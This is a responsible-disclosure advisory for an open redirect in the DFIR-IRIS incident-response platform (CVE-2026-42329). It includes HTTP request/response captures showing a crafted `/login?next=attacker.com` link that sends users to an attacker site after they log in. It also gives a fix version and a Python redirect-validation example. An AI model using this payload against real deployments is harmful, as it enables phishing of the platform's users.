Message-ID: <0c177f31711249c29fc4ea60240a91f0@sba-research.org>
Date: Tue, 19 May 2026 14:04:46 +0000
From: SBA Research Security Advisory <advisory@...-research.org>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: [SBA-ADV-20260126-02] CVE-2026-42329: DFIR-IRIS before 2.4.28 Open Redirect


# DFIR-IRIS Open Redirect #

Link: https://github.com/sbaresearch/advisories/tree/public/2026/SBA-ADV-20260126-02_DFIR-IRIS_Open_Redirect

## Vulnerability Overview ##

The IRIS web application contains an open redirect weakness that an attacker
can misuse to send a user to a malicious website under the attacker's control.

* **Identifier**            : SBA-ADV-20260126-02
* **Type of Vulnerability** : Open Redirect
* **Software/Product Name** : [IRIS](https://www.dfir-iris.org/)
* **Vendor**                : [DFIR-IRIS](https://github.com/dfir-iris)
* **Affected Versions**     : <= 2.4.27
* **Fixed in Version**      : v2.4.28
* **CVE ID**                : CVE-2026-42329
* **CVSS Vector**           : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
* **CVSS Base Score**       : 4.7 (Medium)

## Vendor Description ##

> IRIS is a collaborative digital platform designed for incident response
> analysts to share complex investigations at a technical level. It can be
> installed on a dedicated server or as a portable application for roaming
> investigations where internet access might not be available.

Source: <https://docs.dfir-iris.org/2.4.24/>

## Impact ##

A user can be sent a trustworthy-looking link that points to an IRIS
deployment, but after opening it in the browser and authenticating, they are
redirected to a malicious website controlled by the attacker. This facilitates
phishing attacks.

## Vulnerability Description ##

Open Redirect vulnerabilities arise when a web application uses some form of
redirect (HTTP redirects, JavaScript redirects) and, due to insufficient input
validation, an attacker can change the redirect target to a different
(malicious) domain.

## Proof of Concept ##

If a user can be made to open a link to the login page with an added
parameter like `/login?next=attacker.com`, the standard authentication page
is shown to the user:

```http hl:1
GET /login?next=attacker.com HTTP/1.1
Host: myiris.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Jan 2026 13:56:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4932
Connection: keep-alive
Vary: Cookie
Content-Security-Policy: default-src 'self' https://analytics.dfir-iris.org; script-src 'self' 'unsafe-inline' https://analytics.dfir-iris.org; style-src 'self' 'unsafe-inline'; img-src 'self' data:;
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000: includeSubDomains
Front-End-Https: on

<html>
[...]
```

And after a successful authentication, the user gets redirected to the target
website chosen by the attacker:

```http hl:28,42
POST /login?next=attacker.com HTTP/1.1
Host: myiris.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: https://myiris.local
Referer: https://myiris.local/login?next=attacker.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive

csrf_token=IjJlODY3YWI0NjY4MjUwOTJiMzJjYjUzZjkyZWY2ODRmMjlhNDY5NTgi.aWT9qw.Z9vNLn-B_z0Z1xKr4CRGOah-YY8&username=foo&password=bar

HTTP/1.1 302 FOUND
Server: nginx
Date: Mon, 26 Jan 2026 13:57:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 225
Connection: keep-alive
Location: attacker.com?cid=1
Vary: Cookie
Set-Cookie: session=.eJwtTkluwzAM_ErAXl2Aonafe-krDC0karSxA8k5Bfl75TYncgazPWCRxv0L5qPdeYJlrTBDQhJSURxZEzCYbCwbzBE91ahTDAq5emNSUUG5mqsOVYsio4UCKkfIVlCwhOyHK4RKlSSVmBwpMeS9kmy0NVgHpxLnktFzKKOGETWMIffO7X8NDVh6k-XYv3k7CQ7Op2ycC2QxUtZUstUSicUFIxSTcdGG03dvjbdjKakzzA8471-qml7_JvuIhBfc0nXo4E1d3i-f23qs6efywdcdnhPcuF3X3td96zDjBOfCl_52KHj-AjyeYVM.aWT9sA.a7kmSLN_RbLW15uwED81zY-Rd7o; Secure; HttpOnly; Path=/; SameSite=Lax
Content-Security-Policy: default-src 'self' https://analytics.dfir-iris.org; script-src 'self' 'unsafe-inline' https://analytics.dfir-iris.org; style-src 'self' 'unsafe-inline'; img-src 'self' data:;
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000: includeSubDomains
Front-End-Https: on

<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="attacker.com?cid=1">attacker.com?cid=1</a>. If not, click the link.
```

## Recommended Countermeasures ##

We recommend updating to IRIS version 2.4.28 or later.

IRIS should apply the following countermeasures:

* If possible, avoid constructing redirect targets that contain user input.
* Otherwise, perform input validation to make sure that only desired
redirect targets (local paths on the IRIS host) are possible.
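The second countermeasure in code, as an added example that is not DFIR-IRIS code: the "Redirecting..." page in the proof of concept is the one Werkzeug emits, so the example assumes a Flask-style login view that reads the post-login target from `next`; `DEFAULT_TARGET` and the sample paths are constructed, not IRIS routes.

```python
"""Allow-list validation for a login ``next`` parameter (added example)."""
from typing import Optional
from urllib.parse import urlsplit, urlunsplit

DEFAULT_TARGET = "/dashboard"  # constructed fallback, not an IRIS route


def is_local_redirect(target: str) -> bool:
    """Return True only for a same-origin, path-only target.

    Rejects absolute URLs (https://evil), scheme-relative ones (//evil),
    backslash variants (/\\evil, which browsers normalise to //evil),
    bare hostnames such as the advisory's ``attacker.com?cid=1`` (no
    leading slash), and whitespace/control characters that confuse
    URL parsers or allow header injection.
    """
    if not target or not target.startswith("/"):
        return False  # must be an absolute path on this origin
    if len(target) > 1 and target[1] in "/\\":
        return False  # //host or /\host starts a new authority
    if any(ch.isspace() or ord(ch) < 0x20 for ch in target):
        return False
    parts = urlsplit(target)
    return parts.scheme == "" and parts.netloc == ""


def safe_next(target: Optional[str]) -> str:
    """Sanitised redirect destination: the validated path or the default.

    The value is re-serialised without scheme and netloc so that only the
    path, query and fragment survive, whatever the parser made of the input.
    """
    if target is None or not is_local_redirect(target):
        return DEFAULT_TARGET
    parts = urlsplit(target)
    return urlunsplit(("", "", parts.path, parts.query, parts.fragment))
```

In a Flask view this replaces `redirect(request.args.get("next"))` with `redirect(safe_next(request.args.get("next")))`, so the `next=attacker.com` link from the proof of concept lands on the default page instead.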

## Timeline ##

* `2026-01-26` Identified the vulnerability in version 2.4.26
* `2026-01-30` Initial vendor contact via e-mail
* `2026-02-27` Second vendor contact via e-mail
* `2026-03-30` Report on GitHub due to a missing response from the vendor
* `2026-04-27` Version containing fix (v2.4.28) tagged by vendor
* `2026-04-27` GitHub assigned CVE-2026-42329
* `2026-05-04` Confirm fix for v2.4.28
* `2026-05-19` Public disclosure

## Credits ##

* Michael Koppmann ([SBA Research](https://www.sba-research.org/))
* Mathias Tausig ([SBA Research](https://www.sba-research.org/))

The discovery of this vulnerability was made possible through support from
[CYSSDE](https://cyssde.eu/) and the European Union.

![CYSSDE](images/cyssde.png)
